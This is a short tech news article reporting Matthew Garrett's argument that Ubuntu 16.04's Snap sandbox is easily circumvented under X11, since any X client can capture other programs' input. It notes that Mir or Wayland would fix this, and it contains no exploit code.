Ubuntu Snap's Security Is Easily Circumvented Due To X11

Matthew Garrett has taken time away from working on his new SATA power management patches for the Linux kernel to share his thoughts on Ubuntu's Snap packaging format and its security.

While Ubuntu's Snappy is designed to be secure and prevent applications from exploiting other parts of the system, with Ubuntu continuing to use X11/X.Org by default on Ubuntu 16.04, it's actually not too secure.

As any frequent reader of Phoronix knows, X11/X.Org is not secure at all. "Sandboxed" applications on such an environment simply isn't secure. Matthew Garrett took to writing a simple Snap-packaged example to show how under an X environment a "secure" program can steal any other program's input, due to the X11 design.

Garrett acknowledges that Snap packages will be more secure when using Mir rather than X.Org, but the Ubuntu desktop on 16.04 LTS is not using it as a default. Both Wayland and Mir are much more secure than the xorg-server. For these same reasons is also why GNOME's XDG-App initiative for app sandboxing also prefers the Wayland over the X.Org Server for greater security.

Matthew Garrett concluded his latest blog post with, "The Snap format provides a lot of underlying technology that is a great step towards being able to protect systems against untrustworthy third-party applications, and once Ubuntu shifts to using Mir by default it'll be much better than the status quo. But right now the protections it provides are easily circumvented, and it's disingenuous to claim that it currently gives desktop users any real security."